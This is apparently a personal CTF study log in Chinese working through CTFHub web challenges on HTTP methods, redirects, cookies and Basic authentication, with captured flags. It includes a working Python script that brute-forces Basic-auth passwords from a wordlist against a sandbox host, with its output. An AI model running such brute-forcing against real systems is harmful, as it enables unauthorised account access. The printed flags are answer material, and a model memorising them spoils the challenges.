22.2.2

大年初二

0x01 ctfhub web 请求方式

1. 是HTTP的各种方法的学习
2. wp来自互联网

3. from urllib import request
   
   req = request.Request(method='CTFHUB', url='http://challenge-42fddc686b43e68f.sandbox.ctfhub.com:10800/index.php')
   res = request.urlopen(req)
   print(res.read())

0x02 ctfhub web 302跳转

1. owo

   [root@oao ~]# curl http://challenge-66684d04baa09987.sandbox.ctfhub.com:10800/index.php
   ctfhub{e083eb87c1eb8f6f4cef2e23}

0x03 ctfhub web Cookie

1. 用插件Edit this cookie改掉
2. ctfhub{3d00d90799b8dc1b1d7b87ee}

0x04 ctfhub web 基础认证

1. 不容易，ctfhub{130b2dd63035026a4958912f}

2. 代码

   
   
   
   f=open('dic.dic','r',encoding="utf-8")
   arr=f.readlines()
   arr2=[]
   for i in arr:
     arr2.append(i.strip('\n'))
   
   print(arr2)
   
   
   import requests
   import base64
   import time
   
   #import faker #pip install faker
   import asyncio
   def get(str1):
     b64=base64.b64encode(str1.encode())
     try:
       headers = {'Authorization': 'Basic '+b64.decode()}
       r = requests.get(url, headers=headers,timeout=2)
       print(headers['Authorization'])
       print(str(r)+str(r.status_code))
       return r.status_code
     except:
       try:
         headers = {'Authorization': 'Basic '+b64.decode()}
         r = requests.get(url, headers=headers,timeout=2)
         print(headers['Authorization'])
         print(str(r)+str(r.status_code))
         return r.status_code
       except:
         print("oppos")
   
   url="http://challenge-3e6e821e7aab6f8b.sandbox.ctfhub.com:10800/flag.html"
   for i in arr2:
     str1="admin:"+i
     #print(str1)
     
     #print(b64)
     #print("---------------------")
     if get(str1) != 401:
       break
     time.sleep(0.01)
   
   out:
   Basic YWRtaW46ZnVja21l
   <Response [401]>401
   Basic YWRtaW46Njk2OQ==
   <Response [200]>200